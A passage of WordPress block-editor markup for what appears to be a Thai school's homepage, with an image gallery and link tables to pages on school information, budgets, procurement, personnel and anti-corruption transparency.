h/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1059\" data-type=\"page\" data-id=\"1059\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift 